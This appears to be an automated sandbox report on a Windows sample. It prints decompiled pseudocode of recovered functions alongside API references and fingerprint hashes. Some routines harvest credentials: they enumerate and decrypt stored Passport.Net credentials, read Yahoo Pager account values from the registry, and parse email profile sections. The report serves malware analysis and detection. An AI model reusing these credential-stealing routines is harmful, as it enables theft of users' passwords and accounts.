                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403ABC
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403ADB
                                                                                                                                                                  • strlen.MSVCRT ref: 00403AED
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1786725549-0
                                                                                                                                                                  • Opcode ID: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                                                                                                                                                                  • Instruction ID: 60d5cd2968a458345304ed859c80f0f17d47a7f7ae6e16c58bf0b652b2e175c6
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                                                                                                                                                                  • Instruction Fuzzy Hash: B8116DB650012CBEFB009B94DD85DEBB7ADEF08354F0041A2B719E2091D6759F54CB78
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040ADA4(void* __eax, void* __ebx) {
                                                                                                                                                                  				char _v264;
                                                                                                                                                                  				char _v524;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				long _t13;
                                                                                                                                                                  				void* _t18;
                                                                                                                                                                  				int _t19;
                                                                                                                                                                  				long _t20;
                                                                                                                                                                  				void* _t27;
                                                                                                                                                                  				void* _t31;
                                                                                                                                                                  
                                                                                                                                                                  				_t27 = __ebx;
                                                                                                                                                                  				_t31 = __eax;
                                                                                                                                                                  				_t13 = GetTempPathA(0x104,  &_v524);
                                                                                                                                                                  				_t32 = _t13;
                                                                                                                                                                  				if(_t13 == 0) {
                                                                                                                                                                  					GetWindowsDirectoryA( &_v524, 0x104);
                                                                                                                                                                  				}
                                                                                                                                                                  				_v264 = 0;
                                                                                                                                                                  				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
                                                                                                                                                                  				_t18 = E0040AD61(_t31, _t32,  &_v264, 2, 1);
                                                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                                                  					_t19 = OpenClipboard( *(_t31 + 0x108));
                                                                                                                                                                  					_t34 = _t19;
                                                                                                                                                                  					if(_t19 == 0) {
                                                                                                                                                                  						_t20 = GetLastError();
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t20 = E00405FD0(_t27, 0x104, _t31, _t34,  &_v264);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_t20 != 0) {
                                                                                                                                                                  						E00405F4B(_t20,  *(_t31 + 0x108));
                                                                                                                                                                  					}
                                                                                                                                                                  					return DeleteFileA( &_v264);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t18;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040ADBE
                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ADD0
                                                                                                                                                                  • GetTempFileNameA.KERNEL32(?,0041444C,00000000,?), ref: 0040ADF2
                                                                                                                                                                  • OpenClipboard.USER32 ref: 0040AE12
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040AE2B
                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040AE48
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2014771361-0
                                                                                                                                                                  • Opcode ID: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                                                                                                                                                                  • Instruction ID: 7dfed4210218cbe3633ab85fc006b2e48c808a0cdacf0b0ca9692cf87dba871e
                                                                                                                                                                  • Opcode Fuzzy Hash: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                                                                                                                                                                  • Instruction Fuzzy Hash: 071165725443186BDB209B61DC49FCB7BBCAF14706F0441B6F689E2091EB78DAC48B69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                  			E00410596(intOrPtr* __edi) {
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t9;
                                                                                                                                                                  				intOrPtr* _t16;
                                                                                                                                                                  				intOrPtr _t18;
                                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                                  				intOrPtr _t21;
                                                                                                                                                                  				intOrPtr _t22;
                                                                                                                                                                  
                                                                                                                                                                  				_t16 = __edi;
                                                                                                                                                                  				_t9 =  *(__edi + 0x1c);
                                                                                                                                                                  				 *__edi = 0x415314;
                                                                                                                                                                  				if(_t9 != 0) {
                                                                                                                                                                  					_push(_t9);
                                                                                                                                                                  					L00412096();
                                                                                                                                                                  					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t18 =  *((intOrPtr*)(_t16 + 0x460));
                                                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                                                  					_t9 = E00406B8A(_t18);
                                                                                                                                                                  					_push(_t18);
                                                                                                                                                                  					L00412096();
                                                                                                                                                                  				}
                                                                                                                                                                  				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
                                                                                                                                                                  				if(_t19 != 0) {
                                                                                                                                                                  					_t9 = E00406B8A(_t19);
                                                                                                                                                                  					_push(_t19);
                                                                                                                                                                  					L00412096();
                                                                                                                                                                  				}
                                                                                                                                                                  				_t20 =  *((intOrPtr*)(_t16 + 0x458));
                                                                                                                                                                  				if(_t20 != 0) {
                                                                                                                                                                  					_t9 = E00406B8A(_t20);
                                                                                                                                                                  					_push(_t20);
                                                                                                                                                                  					L00412096();
                                                                                                                                                                  				}
                                                                                                                                                                  				_t21 =  *((intOrPtr*)(_t16 + 0x454));
                                                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                                                  					_t9 = E00406A7D(_t21);
                                                                                                                                                                  					_push(_t21);
                                                                                                                                                                  					L00412096();
                                                                                                                                                                  				}
                                                                                                                                                                  				_t22 =  *((intOrPtr*)(_t16 + 0x450));
                                                                                                                                                                  				if(_t22 != 0) {
                                                                                                                                                                  					_t9 = E00406A7D(_t22);
                                                                                                                                                                  					_push(_t22);
                                                                                                                                                                  					L00412096();
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t9;
                                                                                                                                                                  			}

APIs
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 9b5ba93a1d4d3230e71c89aa2b3a4c501730c6cf36628ebb8de87475de4246d9
• Instruction ID: 21774ca54697e01c1adc3851c2de10052fd52e5bfec277bf8b6dbebc5e22beff
• Opcode Fuzzy Hash: 9b5ba93a1d4d3230e71c89aa2b3a4c501730c6cf36628ebb8de87475de4246d9
• Instruction Fuzzy Hash: 55014872906D316BC5357A3559017DBA3947F05B19B06020FFA09B73424BAC7CE0C9DD
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 44%
E004016E5(void* __ebx) {
	struct tagRECT _v20;
	struct tagPAINTSTRUCT _v84;

	GetClientRect( *(__ebx + 0x10),  &_v20);
	_v20.left = _v20.right - GetSystemMetrics(0x15);
	_v20.top = _v20.bottom - GetSystemMetrics(0x14);
	asm("movsd");
	asm("movsd");
	asm("movsd");
	asm("movsd");
	DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
	return EndPaint( *(__ebx + 0x10),  &_v84);
}

Instruction addresses: 0x004016f4, 0x0040170b, 0x00401715, 0x0040171d, 0x0040171e, 0x00401722, 0x00401727, 0x00401737, 0x0040174d

APIs
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
• String ID:
• API String ID: 19018683-0
• Opcode ID: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
• Instruction ID: 87b9e555b8a68b0804226e1a7d1b9f87043edf3c617a3ea881a1d9d020f86292
• Opcode Fuzzy Hash: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
• Instruction Fuzzy Hash: 0D01FB72900218BFDF04DFA8DC499FE7BBDFB45702F004469EE11AA194DAB1AA08CB54
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 96%
E00411A0F(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
	signed int _v8;
	char _v16;
	char _v24;
	char _v116;
	void _v1156;
	char _v1164;
	void _v1171;
	char _v1172;
	char _v2188;
	void _v2195;
	void _v2196;
	void _v3251;
	void _v3252;
	char _v4020;
	void* __edi;
	void* __esi;
	void* _t96;
	char _t105;
	intOrPtr _t112;
	void* _t115;
	signed int _t116;
	int _t121;
	signed int* _t122;
	void* _t124;
	void* _t125;
	signed int _t128;
	signed int* _t129;
	void* _t132;

	_t116 = __edx;
	_t105 = 0;
	_v2196 = 0;
	memset( &_v2195, 0, 0x3ff);
	_v3252 = 0;
	memset( &_v3251, 0, 0x41e);
	_v1172 = 0;
	memset( &_v1171, 0, 0x41e);
	_a8 = E00411533(_a8,  &_v2196);
	_t121 = strlen(_a4);
	if(_a8 > 8) {
		_t137 = _t121;
		if(_t121 > 0) {
			memcpy( &_v3252, _a4, _t121);
			memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
			E0040BE2A( &_v116);
			_t19 = _t121 + 8; // 0x8
			E0040BE4E(_t19,  &_v116,  &_v3252);
			_t127 =  &_v116;
			E0040BEEC(_t121,  &_v116,  &_v1172);
			_t23 = _t121 + 8; // 0x8
			memcpy( &_v1156,  &_v3252, _t23);
			E0040BE2A( &_v116);
			_t27 = _t121 + 0x18; // 0x18
			E0040BE4E(_t27, _t127,  &_v1172);
			E0040BEEC(_t121, _t127,  &_v24);
			E00405364( &_v4020, _t137,  &_v1164,  &_v24);
			_t122 = _a12;
			E004053E0( &_v16,  &_v1172, _t122,  &_v4020);
			_t112 = _a8;
			_t128 = 0;
			if(_t112 >= 0x18) {
				_t37 = _t112 - 0x18; // -16
				asm("cdq");
				_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
			}
			if(_t128 > _t105) {
				_a4 =  &_v2188;
				_t125 = _t122 + 8;
				_v8 = _t128;
				do {
					E004053E0(_a4, _t112, _t125,  &_v4020);
					_a4 = _a4 + 8;
					_t125 = _t125 + 8;
					_t45 =  &_v8;
					 *_t45 = _v8 - 1;
					_pop(_t112);
				} while ( *_t45 != 0);
				_t112 = _a8;
			}
			_t96 = 8 + _t128 * 8;
			_t50 = _t96 + 8; // 0x8
			if(_t50 > _t112) {
				_t51 = _t112 - 8; // 0x0
				_t96 = _t51;
			}
			if(_t96 > _t105) {
				_t129 = _a12;
				_t124 =  &_v2188 - _t129;
				_t115 = _t96;
				do {
					 *_t129 =  *_t129 ^  *(_t124 + _t129);
					_t129 =  &(_t129[0]);
					_t115 = _t115 - 1;
				} while (_t115 != 0);
			}
			 *((char*)(_t96 + _a12)) = _t105;
			 *_a16 = 1;
			_t105 = 1;
		}
	}
	return _t105;
}

Instruction addresses: 0x00411a0f, 0x00411a1b, 0x00411a2a, 0x00411a30, 0x00411a43, 0x00411a49, 0x00411a57, 0x00411a5d, 0x00411a76, 0x00411a83, 0x00411a85, 0x00411a8b, 0x00411a8d, 0x00411a9e, 0x00411ab4, 0x00411abc, 0x00411ac8, 0x00411ace, 0x00411ada, 0x00411add, 0x00411ae2, 0x00411af4, 0x00411afb, 0x00411b07, 0x00411b0c
                                                                                                                                                                  0x00411b15
                                                                                                                                                                  0x00411b31
                                                                                                                                                                  0x00411b36
                                                                                                                                                                  0x00411b43
                                                                                                                                                                  0x00411b48
                                                                                                                                                                  0x00411b4e
                                                                                                                                                                  0x00411b53
                                                                                                                                                                  0x00411b55
                                                                                                                                                                  0x00411b58
                                                                                                                                                                  0x00411b63
                                                                                                                                                                  0x00411b63
                                                                                                                                                                  0x00411b66
                                                                                                                                                                  0x00411b6e
                                                                                                                                                                  0x00411b71
                                                                                                                                                                  0x00411b74
                                                                                                                                                                  0x00411b77
                                                                                                                                                                  0x00411b81
                                                                                                                                                                  0x00411b86
                                                                                                                                                                  0x00411b8a
                                                                                                                                                                  0x00411b8d
                                                                                                                                                                  0x00411b8d
                                                                                                                                                                  0x00411b90
                                                                                                                                                                  0x00411b90
                                                                                                                                                                  0x00411b93
                                                                                                                                                                  0x00411b93
                                                                                                                                                                  0x00411b96
                                                                                                                                                                  0x00411b9d
                                                                                                                                                                  0x00411ba2
                                                                                                                                                                  0x00411ba4
                                                                                                                                                                  0x00411ba4
                                                                                                                                                                  0x00411ba4
                                                                                                                                                                  0x00411ba9
                                                                                                                                                                  0x00411bab
                                                                                                                                                                  0x00411bb4
                                                                                                                                                                  0x00411bb6
                                                                                                                                                                  0x00411bb8
                                                                                                                                                                  0x00411bbb
                                                                                                                                                                  0x00411bbd
                                                                                                                                                                  0x00411bbe
                                                                                                                                                                  0x00411bbe
                                                                                                                                                                  0x00411bb8
                                                                                                                                                                  0x00411bc4
                                                                                                                                                                  0x00411bcd
                                                                                                                                                                  0x00411bcf
                                                                                                                                                                  0x00411bcf
                                                                                                                                                                  0x00411a8d
                                                                                                                                                                  0x00411bd7

APIs
• memset.MSVCRT ref: 00411A30
• memset.MSVCRT ref: 00411A49
• memset.MSVCRT ref: 00411A5D
  • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
• strlen.MSVCRT ref: 00411A79
• memcpy.MSVCRT ref: 00411A9E
• memcpy.MSVCRT ref: 00411AB4
  • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
  • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
  • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
  • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
  • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
• memcpy.MSVCRT ref: 00411AF4
  • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
  • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memcpymemset$strlen
• String ID:
• API String ID: 2142929671-0
• Opcode ID: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
• Instruction ID: 6f2ed515a41b06c6c22f205846f23ff7f18478afa58802cd03ca93c0f6d1378b
• Opcode Fuzzy Hash: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
• Instruction Fuzzy Hash: 29512B7290015DAACB14DF55CC81AEEB7A9FF04308F5441BAE609E7151EB34AA89CF98
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 36%
E00407A69(signed short __ebx) {
	signed int _t17;
	void* _t18;
	intOrPtr _t23;
	void* _t31;
	signed short _t39;
	signed int _t40;
	void* _t51;
	int _t56;
	void* _t57;
	int _t67;

	_t39 = __ebx;
	if( *0x418540 == 0) {
		E004079E7();
	}
	_t40 =  *0x418538;
	_t17 = 0;
	if(_t40 <= 0) {
		L5:
		_t51 = 0;
	} else {
		while(_t39 !=  *((intOrPtr*)( *0x418530 + _t17 * 4))) {
			_t17 = _t17 + 1;
			if(_t17 < _t40) {
				continue;
			} else {
				goto L5;
			}
			goto L6;
		}
		_t51 =  *((intOrPtr*)( *0x418534 + _t17 * 4)) +  *0x418528;
	}
	L6:
	if(_t51 != 0) {
		L22:
		_t18 = _t51;
	} else {
		if((_t39 & 0x00010000) == 0) {
			if( *0x4181b8 == 0) {
				_push( *0x418548 - 1);
				_push( *0x41852c);
				_push(_t39);
				_push(E00407BBF());
				goto L16;
			} else {
				strcpy(0x4182c0, "strings");
				_t31 = E00407EF3(_t39,  *0x41852c);
				_t57 = _t57 + 0x10;
				if(_t31 == 0) {
					L14:
					_push( *0x418548 - 1);
					_push( *0x41852c);
					_push(_t39);
					goto L9;
				} else {
					_t56 = strlen( *0x41852c);
					if(_t56 == 0) {
						goto L14;
					}
				}
			}
		} else {
			_push( *0x418548 - 1);
			_push( *0x41852c);
			_push(_t39 & 0x0000ffff);
			L9:
			_push( *0x417b94);
			L16:
			_t56 = LoadStringA();
			_t67 = _t56;
		}
		if(_t67 <= 0) {
			L21:
			_t18 = 0x41344f;
		} else {
			_t23 =  *0x41853c;
			if(_t23 + _t56 + 2 >=  *0x418540 ||  *0x418538 >=  *0x418544) {
				goto L21;
			} else {
				_t51 = _t23 +  *0x418528;
				_t10 = _t56 + 1; // 0x1
				memcpy(_t51,  *0x41852c, _t10);
				 *((intOrPtr*)( *0x418534 +  *0x418538 * 4)) =  *0x41853c;
				 *( *0x418530 +  *0x418538 * 4) = _t39;
				 *0x418538 =  *0x418538 + 1;
				 *0x41853c =  *0x41853c + _t56 + 1;
				if(_t51 != 0) {
					goto L22;
				} else {
					goto L21;
				}
			}
		}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t18;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76D24DE0), ref: 00407AE4
                                                                                                                                                                    • Part of subcall function 00407EF3: _itoa.MSVCRT ref: 00407F14
                                                                                                                                                                  • strlen.MSVCRT ref: 00407B02
                                                                                                                                                                  • LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                  • memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A0F
                                                                                                                                                                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A2D
                                                                                                                                                                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A4B
                                                                                                                                                                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A5B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                                                                                                                                  • String ID: strings
                                                                                                                                                                  • API String ID: 1748916193-3030018805
                                                                                                                                                                  • Opcode ID: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
                                                                                                                                                                  • Instruction ID: 4e35bd01ad2207757dd6e5c19dba2cefa7e6d732e740aa6e4bc5455c9760af59
                                                                                                                                                                  • Opcode Fuzzy Hash: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
                                                                                                                                                                  • Instruction Fuzzy Hash: BA315771A08101AFD7159B58ED80DA63777E744348750807EEC01A72A2DF39BD81CF5E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E0040DC39(char* __ebx, void* __eflags) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				short* _v12;
                                                                                                                                                                  				int _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                  				char _v32;
                                                                                                                                                                  				intOrPtr _v48;
                                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                                  				int _v56;
                                                                                                                                                                  				char _v60;
                                                                                                                                                                  				char _v584;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t36;
                                                                                                                                                                  				intOrPtr _t44;
                                                                                                                                                                  				void* _t47;
                                                                                                                                                                  				char _t63;
                                                                                                                                                                  				int _t69;
                                                                                                                                                                  				void* _t74;
                                                                                                                                                                  
                                                                                                                                                                  				_t74 = __eflags;
                                                                                                                                                                  				_t69 = 0;
                                                                                                                                                                  				E004046E1( &_v584);
                                                                                                                                                                  				_v60 = 0;
                                                                                                                                                                  				_v56 = 0;
                                                                                                                                                                  				_t36 = E00404651( &_v60, 0, _t74);
                                                                                                                                                                  				_t75 = _t36;
                                                                                                                                                                  				if(_t36 != 0 && E004047AA( &_v584, _t75) != 0) {
                                                                                                                                                                  					_push( &_v8);
                                                                                                                                                                  					_push(0);
                                                                                                                                                                  					_push(4);
                                                                                                                                                                  					_push("Passport.Net\\*");
                                                                                                                                                                  					if(_v52() != 0) {
                                                                                                                                                                  						_t44 = _v8;
                                                                                                                                                                  						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
                                                                                                                                                                  							_v32 =  *((intOrPtr*)(_t44 + 0x18));
                                                                                                                                                                  							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
                                                                                                                                                                  							_t47 = 0;
				_t63 = 0x4a;
				do {
					_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
					 *(_t47 + 0x418768) =  *_t14 << 2;
					_t47 = _t47 + 2;
				} while (_t47 < _t63);
				_v24 = _t63;
				_v20 = 0x418768;
				if(E0040481B( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
					if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
						strcpy(__ebx,  *(_v8 + 0x30));
						_t69 = 1;
					}
					LocalFree(_v12);
				}
				_t44 = _v8;
			}
			_v48(_t44);
		}
	}
	E004046CC( &_v60);
	E004047FB( &_v584);
	return _t69;
}
APIs
  • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
  • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,7479F420), ref: 0040465E
  • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
  • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
  • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
  • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
  • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
  • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
  • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
• strlen.MSVCRT ref: 0040DD15
• strcpy.MSVCRT(?,?), ref: 0040DD26
• LocalFree.KERNEL32(?), ref: 0040DD33
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
• String ID: Passport.Net\*
• API String ID: 3335197805-3671122194
• Opcode ID: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
• Instruction ID: efac9c12738a0d8289842d1efaad299d98c72222a78c1cf1bd4cf7de0e5ce36b
• Opcode Fuzzy Hash: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
• Instruction Fuzzy Hash: 47313AB6E00109ABDB10EF96DD45DEE7BB8EF85304F10007AE605F7291D7389A45CB68
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00403278(void* __fp0, intOrPtr _a4) {
	int _v8;
	char _v12;
	char _v13;
	char _v14;
	char _v15;
	void _v1035;
	char _v1036;
	char _v1968;
	char _v2900;
	void* __esi;
	void* _t23;
	int _t30;
	char* _t31;
	CHAR* _t49;
	void* _t50;
	void* _t55;

	_t62 = __fp0;
	_t49 = _a4 + 0xd2a;
	if( *_t49 != 0) {
		_t52 =  &_v1968;
		E00402197( &_v1968);
		if(E00403127(_t52, _t49, 0) != 0) {
			E004023C6(_t52, __fp0, _a4);
		}
		_v1036 = 0;
		memset( &_v1035, 0, 0x400);
		_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
		if(_t30 <= 0) {
			L11:
			return _t30;
		} else {
			_v12 = 0;
			_v13 = 0;
			_v14 = 0;
			_v15 = 0;
			_t50 = 0;
			_t31 =  &_v1036;
			while(1) {
				_t30 = strlen(_t31);
				_v8 = _t30;
				if(_t30 <= 0) {
					goto L11;
				}
				_t54 =  &_v2900;
				E00402197( &_v2900);
				if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E00403127(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
					E004023C6(_t54, _t62, _a4);
				}
				_t30 = _v8;
				_t50 = _t50 + _t30 + 1;
				if(_t50 >= 0x3ff) {
					goto L11;
				} else {
					_t31 = _t55 + _t50 - 0x408;
					continue;
				}
			}
			goto L11;
		}
	}
	return _t23;
}
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403355
                                                                                                                                                                  0x00403355
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403355
                                                                                                                                                                  0x00403353
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040335c
                                                                                                                                                                  0x004032ee
                                                                                                                                                                  0x0040336e

APIs
  • Part of subcall function 00403127: strchr.MSVCRT ref: 0040323C
• memset.MSVCRT ref: 004032CC
• GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 004032E6
• strchr.MSVCRT ref: 0040331B
  • Part of subcall function 004023C6: _mbsicmp.MSVCRT ref: 004023FE
• strlen.MSVCRT ref: 0040335D
  • Part of subcall function 004023C6: _mbscmp.MSVCRT ref: 004023DA
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
• String ID: Personalities
• API String ID: 2103853322-4287407858
• Opcode ID: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
• Instruction ID: a1e53a31d12307489e3dcdfde72dead8da93f466afb76ebe56892d48a8bd1a3f
• Opcode Fuzzy Hash: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
• Instruction Fuzzy Hash: 2A21D676A041096EDB10AF699D81ADE7F6C9F00309F1440BBEA04F3181DB789B86866D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00411622(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
	void* _v8;
	void _v1031;
	char _v1032;
	void* __esi;
	void* _t25;
	int _t26;

	_t25 = __ecx;
	_t26 = 0;
	_v1032 = 0;
	memset(&_v1031, 0, 0x3ff);
	if(E0040F1B0(0x80000001, "Software\\Yahoo\\Pager", &_v8) == 0) {
		if(E0040F1F1(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040F1F1(0x3ff, _t25, _v8, "EOptions string", &_v1032) == 0) {
			_t26 = E0041194A(_t25, _a8, _a4, &_v1032);
		}
		RegCloseKey(_v8);
	}
	return _t26;
}


APIs
• memset.MSVCRT ref: 00411644
  • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
  • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
Strings
Memory Dump Source
